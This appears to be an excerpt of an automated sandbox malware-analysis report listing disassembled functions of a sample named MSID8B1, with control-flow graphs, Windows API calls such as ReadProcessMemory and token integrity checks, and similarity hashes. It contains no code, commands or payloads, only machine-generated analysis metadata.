                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                  • String ID:
                                                                  • API String ID: 928366108-0
                                                                  • Opcode ID: e2c145b60b30e7f1da0dc782bb7dc577d267342bf3b206292b9fd5d5f69dc0ce
                                                                  • Instruction ID: b4bd4884586efed6041f5e478650608174ae2a7c24be74f3cc7fdc582cc049be
                                                                  • Opcode Fuzzy Hash: e2c145b60b30e7f1da0dc782bb7dc577d267342bf3b206292b9fd5d5f69dc0ce
                                                                  • Instruction Fuzzy Hash: 8C22BE70A04398DFEB21CFA8D948BADBBF4EF45308F1481D9E409EB281DB759A45CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B23C20 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 225librarynativeloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 105 b23c20-b23c9c call b236d0 108 b23ca2-b23cb0 GetProcAddress 105->108 109 b23f40-b23f78 105->109 110 b23cb6-b23cd0 NtQueryInformationProcess 108->110 111 b23f34-b23f3a GetLastError 108->111 112 b23f7a 109->112 113 b23f8b-b23fa7 call b42937 109->113 110->109 114 b23cd6-b23d11 call b44080 ReadProcessMemory 110->114 111->109 115 b23f7b-b23f81 FreeLibrary 112->115 120 b23d13-b23d2c 114->120 121 b23d5b-b23d8a call b44080 ReadProcessMemory 114->121 115->113 123 b23d36-b23d4f 120->123 126 b23db1-b23db7 121->126 127 b23d8c-b23daf 121->127 123->113 125 b23d55-b23d56 123->125 125->115 128 b23dd7-b23e13 126->128 129 b23db9-b23dd2 126->129 127->123 130 b23e15-b23e29 128->130 131 b23e2b-b23e36 128->131 129->123 132 b23e95-b23ed8 ReadProcessMemory 130->132 133 b23e83-b23e90 call b21bd0 131->133 134 b23e38-b23e57 131->134 138 b23ef7-b23f2f call b22e60 132->138 139 b23eda-b23ef2 call b22e60 132->139 133->132 135 b23e72-b23e81 134->135 136 b23e59-b23e6c 134->136 135->132 136->135 138->111 139->138
                                                                  APIs
                                                                    • Part of subcall function 00B236D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00B23735
                                                                    • Part of subcall function 00B236D0: _wcschr.LIBVCRUNTIME ref: 00B237C6
                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00B23CA8
                                                                  • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 00B23CC4
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00B23D01
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00B23D7A
                                                                  • ReadProcessMemory.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00B23EB1
                                                                  • GetLastError.KERNEL32 ref: 00B23F34
                                                                  • FreeLibrary.KERNEL32(?), ref: 00B23F7B
                                                                  Strings
                                                                  • NtQueryInformationProcess, xrefs: 00B23CA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MemoryRead$AddressDirectoryErrorFreeInformationLastLibraryProcQuerySystem_wcschr
                                                                  • String ID: NtQueryInformationProcess
                                                                  • API String ID: 847666571-2781105232
                                                                  • Opcode ID: d014acc574ebe855bf45e3fe304baca51413b42f00701b77bccfa7a4a86a4062
                                                                  • Instruction ID: eba0bc82c5e00bc9b45f9d7962dc369d4748adbd5b08c4245cb1f8c74112e3fe
                                                                  • Opcode Fuzzy Hash: d014acc574ebe855bf45e3fe304baca51413b42f00701b77bccfa7a4a86a4062
                                                                  • Instruction Fuzzy Hash: 87A17D70904659DEDB20DF64DD497AEBBF0FF48708F10459DD409A7280EBB95A88CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B23860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 240 b23860-b238e5 CreateToolhelp32Snapshot 241 b238e7-b2391f CloseHandle 240->241 242 b2393e-b23967 call b44080 Process32FirstW 240->242 243 b23925-b23939 241->243 244 b23b2c-b23b50 call b42937 241->244 249 b23ab6-b23aed 242->249 250 b2396d 242->250 254 b23b22 243->254 252 b23aef-b23af6 CloseHandle 249->252 253 b23afd-b23b0c 249->253 255 b23970-b23993 OpenProcess 250->255 252->253 253->244 256 b23b0e-b23b1e 253->256 254->244 257 b239a6-b239dc call b23c20 255->257 258 b23995-b239a1 255->258 256->254 264 b239e3-b239ec 257->264 259 b23a8e-b23a94 FindCloseChangeNotification 258->259 261 b23a9b-b23aaa Process32NextW 259->261 261->255 263 b23ab0-b23ab3 261->263 263->249 264->264 265 b239ee-b23a1b call b224c0 264->265 268 b23b51-b23b56 call b2d305 265->268 269 b23a21-b23a54 call b244a0 call b22e60 * 2 265->269 277 b23a56-b23a59 269->277 278 b23a7e-b23a8b 269->278 280 b23a5b-b23a66 277->280 281 b23a68-b23a7b call b240b0 277->281 278->261 279 b23a8d 278->279 279->259 280->278 281->278
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B238CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B2390B
                                                                  • Process32FirstW.KERNEL32(?,00000000), ref: 00B2395F
                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B2397A
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B23A8E
                                                                  • Process32NextW.KERNEL32(?,00000000), ref: 00B23AA2
                                                                  • CloseHandle.KERNEL32(?), ref: 00B23AF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Close$HandleProcess32$ChangeCreateFindFirstNextNotificationOpenProcessSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 2156003543-0
                                                                  • Opcode ID: df6a2b08b9440f34e21460382807ff7979194ad904fc0738e7440f211d3a1ed6
                                                                  • Instruction ID: 9b8fbf19fdbd81e3139c0ce12d8d6ca80ac13d5c2e2fe9c475833056934129b8
                                                                  • Opcode Fuzzy Hash: df6a2b08b9440f34e21460382807ff7979194ad904fc0738e7440f211d3a1ed6
                                                                  • Instruction Fuzzy Hash: 73A10E71901259EFDF10CFA4D988BDEBBF8FF49704F144199E819AB290D7B85A44CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B26A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 285 b26a50-b26a82 286 b26aa3-b26add GetCurrentProcess OpenProcessToken 285->286 287 b26a84-b26aa2 call b42937 285->287 291 b26b09-b26b1e call b25de0 286->291 292 b26adf-b26af2 286->292 298 b26b20-b26b2c call b21770 291->298 299 b26b2e-b26b30 291->299 294 b26b02-b26b04 292->294 295 b26af4-b26afb CloseHandle 292->295 296 b26c24-b26c2b call b257c0 294->296 295->294 305 b26c31-b26c35 296->305 306 b26ddb-b26e06 call b22310 296->306 298->292 303 b26b32-b26b3d call b21770 299->303 304 b26b3f-b26ba5 call b25f40 call b224c0 299->304 303->292 323 b26ba7-b26ba9 304->323 324 b26bdb 304->324 305->306 310 b26c3b-b26c3d 305->310 318 b26f96-b26fa0 call b211d0 306->318 319 b26e0c-b26e2b call b246f0 306->319 310->306 314 b26c43-b26c59 call b22310 310->314 314->318 327 b26c5f-b26c7e call b246f0 314->327 338 b26e59-b26e6a call b22310 319->338 339 b26e2d-b26e2f 319->339 325 b26c88-b26c8a 323->325 326 b26baf-b26bb8 323->326 328 b26bdd-b26c14 call b22e60 * 2 call b21770 324->328 325->328 326->324 332 b26bba-b26bbc 326->332 352 b26c80-b26c82 327->352 353 b26cad-b26cc9 call b22310 327->353 328->296 364 b26c16-b26c1d FindCloseChangeNotification 328->364 335 b26bbf 332->335 335->324 340 b26bc1-b26bc4 335->340 338->318 358 b26e70-b26e8c call b246f0 338->358 343 b26e31-b26e33 339->343 344 b26e35-b26e3a 339->344 340->325 345 b26bca-b26bd9 340->345 349 b26e4f-b26e54 call b24ac0 343->349 350 b26e40-b26e49 344->350 345->324 345->335 349->338 350->350 356 b26e4b-b26e4d 350->356 359 b26c84-b26c86 352->359 360 b26c8f-b26c91 352->360 353->318 368 b26ccf-b26ceb call b246f0 353->368 356->349 373 b26eb9-b26ec6 call b22310 358->373 374 b26e8e-b26e90 358->374 363 b26ca3-b26ca8 call b24ac0 359->363 365 b26c94-b26c9d 360->365 363->353 364->296 365->365 366 b26c9f-b26ca1 365->366 366->363 383 b26d19-b26d26 call b22310 368->383 384 b26ced-b26cef 368->384 373->318 388 b26ecc-b26ee8 call b246f0 373->388 376 b26e92-b26e94 374->376 377 b26e96-b26e9b 374->377 380 b26eaf-b26eb4 call b24ac0 376->380 381 b26ea0-b26ea9 377->381 380->373 381->381 386 b26eab-b26ead 381->386 383->318 395 b26d2c-b26d48 call b246f0 383->395 389 b26cf1-b26cf3 384->389 390 b26cf5-b26cfa 384->390 386->380 401 b26f10-b26f47 call b252f0 388->401 402 b26eea-b26eec 388->402 392 b26d0f-b26d14 call b24ac0 389->392 393 b26d00-b26d09 390->393 392->383 393->393 397 b26d0b-b26d0d 393->397 411 b26d70-b26d85 call b24ba0 395->411 412 b26d4a-b26d4c 395->412 397->392 416 b26f51-b26f65 401->416 417 b26f49-b26f4c 401->417 404 b26ef2-b26ef4 402->404 405 b26eee-b26ef0 402->405 409 b26ef7-b26f00 404->409 408 b26f06-b26f0b call b24ac0 405->408 408->401 409->409 414 b26f02-b26f04 409->414 420 b26d8a-b26da4 411->420 418 b26d52-b26d54 412->418 419 b26d4e-b26d50 412->419 414->408 422 b26f67-b26f6a 416->422 423 b26f6f-b26f76 416->423 417->416 424 b26d57-b26d60 418->424 421 b26d66-b26d6b call b24ac0 419->421 427 b26da6-b26da9 420->427 428 b26dae-b26dc2 420->428 421->411 422->423 426 b26f79-b26f84 423->426 424->424 429 b26d62-b26d64 424->429 430 b26f86-b26f89 426->430 431 b26f8e 426->431 427->428 432 b26dc4-b26dc7 428->432 433 b26dcc-b26dd6 428->433 429->421 430->431 431->318 432->433 433->426
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00B26AC8
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B26AD5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B26AF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCurrentHandleOpenToken
                                                                  • String ID: S-1-5-18
                                                                  • API String ID: 4052875653-4289277601
                                                                  • Opcode ID: 998f662e62146f375805576e8849cb12d3dcf2ae4e31eb6ddcfcd82243dbf4e8
                                                                  • Instruction ID: 60490bb44e7334bb95208a296624459a7a332d9c40f29bd31c40f6153385cfd1
                                                                  • Opcode Fuzzy Hash: 998f662e62146f375805576e8849cb12d3dcf2ae4e31eb6ddcfcd82243dbf4e8
                                                                  • Instruction Fuzzy Hash: D702E130901269DFDF14DFA4E9557AEBBF4EF05304F1486D8D80AAB291EB34AE05CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B29730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 b29730-b29781 call b30c94 147 b29783 144->147 148 b29785-b297e3 call b30ed6 144->148 147->148 151 b297e9-b2980c call b2f544 148->151 152 b298ff-b2998c call b2d362 call b30df9 call b28040 call b29730 148->152 157 b29810-b29814 151->157 178 b29991-b2999e 152->178 160 b29830-b29832 157->160 161 b29816-b29818 157->161 165 b29835-b29837 160->165 163 b2981a-b29820 161->163 164 b2982c-b2982e 161->164 163->160 167 b29822-b2982a 163->167 164->165 168 b29839-b2983d 165->168 169 b2983f-b2984a call b2f57a 165->169 167->157 167->164 172 b298b7-b298d5 call b29510 168->172 173 b2984f-b29860 169->173 184 b298d7-b298e8 172->184 185 b298eb-b298f5 172->185 176 b29862 173->176 177 b29864-b2986c 173->177 176->177 180 b298b4 177->180 181 b2986e-b29870 177->181 182 b299a0-b299ab 178->182 183 b299c5-b299f2 call b42937 178->183 180->172 186 b29872-b29878 call b46c83 181->186 187 b2987b-b29884 181->187 188 b299ba-b299bc 182->188 189 b299ad-b299b8 182->189 185->152 200 b298f7-b298fb 185->200 186->187 187->180 193 b29886-b2988b 187->193 188->183 194 b299be-b299bf LocalFree 188->194 189->188 192 b299f5-b29a87 call b47027 189->192 205 b29a89-b29a8d 192->205 206 b29a8f-b29a95 192->206 198 b29896-b298a7 call b4b7c6 193->198 199 b2988d 193->199 194->183 198->180 209 b298a9-b298b1 call b441e0 198->209 202 b29890-b29894 199->202 200->152 202->198 202->202 208 b29a99-b29a9e 205->208 206->208 211 b29aa0-b29aac 208->211 209->180 213 b29ae0-b29aea call b21bd0 211->213 214 b29aae-b29ac6 211->214 218 b29aef-b29b15 call b51144 213->218 215 b29ad8-b29ade 214->215 216 b29ac8-b29ad5 214->216 215->218 216->215 221 b29b17-b29b19 218->221 222 b29b1b-b29b22 218->222 221->211 223 b29b24-b29b2a 222->223 224 b29b2c-b29b2f 222->224 225 b29b32-b29b43 223->225 224->225 226 b29b94-b29bcb call b22e60 call b42937 225->226 227 b29b45-b29b4a 225->227 228 b29b89 227->228 229 b29b4c-b29b52 227->229 233 b29b8d-b29b92 228->233 231 b29b71-b29b79 229->231 232 b29b54-b29b5b 229->232 237 b29b7c-b29b87 231->237 232->231 235 b29b5d-b29b6f 232->235 233->226 233->227 235->237 237->228 237->233
                                                                  APIs
                                                                  • std::locale::_Init.LIBCPMT ref: 00B29763
                                                                    • Part of subcall function 00B30C94: __EH_prolog3.LIBCMT ref: 00B30C9B
                                                                    • Part of subcall function 00B30C94: std::_Lockit::_Lockit.LIBCPMT ref: 00B30CA6
                                                                    • Part of subcall function 00B30C94: std::locale::_Setgloballocale.LIBCPMT ref: 00B30CC1
                                                                    • Part of subcall function 00B30C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00B30D17
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2978A
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B297F0
                                                                  • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00B2984A
                                                                    • Part of subcall function 00B2F57A: __EH_prolog3.LIBCMT ref: 00B2F581
                                                                    • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F5C8
                                                                    • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F620
                                                                    • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F654
                                                                    • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F6A8
                                                                  • LocalFree.KERNEL32(00000000,00000000,?,00B754B1,00000000), ref: 00B299BF
                                                                  • __cftoe.LIBCMT ref: 00B29B0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                  • String ID: bad locale name
                                                                  • API String ID: 3103716676-1405518554
                                                                  • Opcode ID: a3cac39a8a8b266966b548cb2ae7731e307bdb8e440ec5d3853fb3ee52506649
                                                                  • Instruction ID: 6c61c655154048fb944be5066b4b65a4b2a5d4b2806162b7b9f9688a27f59109
                                                                  • Opcode Fuzzy Hash: a3cac39a8a8b266966b548cb2ae7731e307bdb8e440ec5d3853fb3ee52506649
                                                                  • Instruction Fuzzy Hash: 6AF1AD71D01258DFDB10CFA8D984BAEBBF1EF09304F2441A9E80DAB381E7759A44CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B257C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 434 b257c0-b257df GetCurrentProcess OpenProcessToken 435 b257e1-b257e6 434->435 436 b257e7-b25814 GetTokenInformation 434->436 437 b25816-b2581b 436->437 438 b2581e-b2582e CloseHandle 436->438 437->438
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000008,?,823FDEC6,?,-00000010), ref: 00B257D0
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00B257D7
                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00B2580C
                                                                  • CloseHandle.KERNEL32(?), ref: 00B25822
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                  • String ID:
                                                                  • API String ID: 215268677-0
                                                                  • Opcode ID: d7baa7ddb3bafbf9b9af5e013550fc5de76b022dfd5982142e49119d891a5c16
                                                                  • Instruction ID: 6aee845d7df1e976429623b8817fb67e2851abf28ce018b80cc5d39be7e0fde5
                                                                  • Opcode Fuzzy Hash: d7baa7ddb3bafbf9b9af5e013550fc5de76b022dfd5982142e49119d891a5c16
                                                                  • Instruction Fuzzy Hash: EFF01D74188301ABEB109F20EC49BAA7BE8FB44704F508859FD84C21A0DBB9955CDB73
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2CDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCommandLineW.KERNEL32(823FDEC6,?,?,?,?,?,?,?,?,?,00B656D5,000000FF), ref: 00B2CDE8
                                                                    • Part of subcall function 00B21F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00B24251,823FDEC6,00000000,?,00000000,?,?,?,00B64400,000000FF,?), ref: 00B21F9D
                                                                  • ExitProcess.KERNEL32 ref: 00B2CEB1
                                                                    • Part of subcall function 00B26600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00B2667E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                  • String ID: Full command line:
                                                                  • API String ID: 1878577176-831861440
                                                                  • Opcode ID: 5d717a639c54b468865b282b0501eab90a072e532089d244999364f75319c77d
                                                                  • Instruction ID: cea823f08d3dc15e36daeb4f00ecc03a3d24bb9d85a2d54d6e43b945560b0176
                                                                  • Opcode Fuzzy Hash: 5d717a639c54b468865b282b0501eab90a072e532089d244999364f75319c77d
                                                                  • Instruction Fuzzy Hash: 7F212131910264ABCB15FB60EC42BEE77E1AF14740F104598F41AAB292EF786B08C7E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B25E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 471 b25e40-b25ebc GetTokenInformation 472 b25f20-b25f33 471->472 473 b25ebe-b25ec7 GetLastError 471->473 473->472 474 b25ec9-b25ed7 473->474 475 b25ed9-b25edc 474->475 476 b25ede 474->476 477 b25f0b 475->477 478 b25ee0-b25ee7 476->478 479 b25f0e-b25f1a GetTokenInformation 476->479 477->479 480 b25ef7-b25f08 call b44080 478->480 481 b25ee9-b25ef5 call b260d0 478->481 479->472 480->477 481->479
                                                                  APIs
                                                                  • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00B25E18,823FDEC6,?), ref: 00B25EB4
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00B25E18,823FDEC6,?), ref: 00B25EBE
                                                                  • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00B25E18,823FDEC6,?), ref: 00B25F1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InformationToken$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2567405617-0
                                                                  • Opcode ID: 767604aefca442bc2640a850f663760197d32149402f542376a4a9507d5e9fb7
                                                                  • Instruction ID: 888d99a46b0bda7eebbaafcef9b2683138571500afed8343c94efdc07677ed30
                                                                  • Opcode Fuzzy Hash: 767604aefca442bc2640a850f663760197d32149402f542376a4a9507d5e9fb7
                                                                  • Instruction Fuzzy Hash: C7318F71A006159FDB20CF58DD45BAFBBF9FB44714F10456EE519E7280DBB569008BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3862E Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 486 b3862e-b38651 call b4325f call b31d36 490 b38656-b38663 call b423f8 call b4323c 486->490
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B38635
                                                                  • _Getvals.LIBCPMT ref: 00B38651
                                                                    • Part of subcall function 00B31D36: std::_Locinfo::_Getdays.LIBCPMT ref: 00B31D61
                                                                    • Part of subcall function 00B31D36: _Maklocstr.LIBCPMT ref: 00B31D67
                                                                    • Part of subcall function 00B31D36: std::_Locinfo::_Getmonths.LIBCPMT ref: 00B31D7A
                                                                    • Part of subcall function 00B31D36: _Maklocstr.LIBCPMT ref: 00B31D80
                                                                    • Part of subcall function 00B31D36: _Maklocstr.LIBCPMT ref: 00B31D8F
                                                                    • Part of subcall function 00B423F8: GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00B400E2,00000000,00000000,00000004,00B3ED14,00000000,00000004,00B3F127,00000000,00000000), ref: 00B42410
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Maklocstr$Locinfo::_std::_$GetdaysGetmonthsGetvalsH_prolog3InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 1702918112-0
                                                                  • Opcode ID: 1b52960a35d31e1fffb9a26ec5b7a97265cbdb6fc730b173d0ab44b652e4a2d6
                                                                  • Instruction ID: ca788e670b749db5f2a38855da03bf66e0b70a95289b407e3ca1f79d53266943
                                                                  • Opcode Fuzzy Hash: 1b52960a35d31e1fffb9a26ec5b7a97265cbdb6fc730b173d0ab44b652e4a2d6
                                                                  • Instruction Fuzzy Hash: 5FE08CF0C003009FCB20EFB8840161EBAF0FF04700B008DAEA558D7201D7B48700AB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B570BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
